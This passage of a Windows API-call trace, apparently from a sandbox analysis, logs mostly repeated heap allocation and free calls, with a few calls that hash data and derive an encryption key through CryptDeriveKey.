dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0179.513] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0179.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0179.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0179.516] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.516] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.516] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.516] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.516] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.517] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0179.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x9bd828, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.518] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDeriveKey") returned 0x74f63188 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0179.519] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0179.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0179.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0179.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0179.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0179.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0179.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0179.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0179.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0179.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0179.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0179.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0179.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0179.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0179.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0179.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0179.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0179.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0179.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0179.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0179.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0179.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0179.521] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0179.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0179.522] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.522] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0179.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0179.522] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0179.522] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0179.522] RtlAllocateHeap (HeapHandle=0x8a0000, 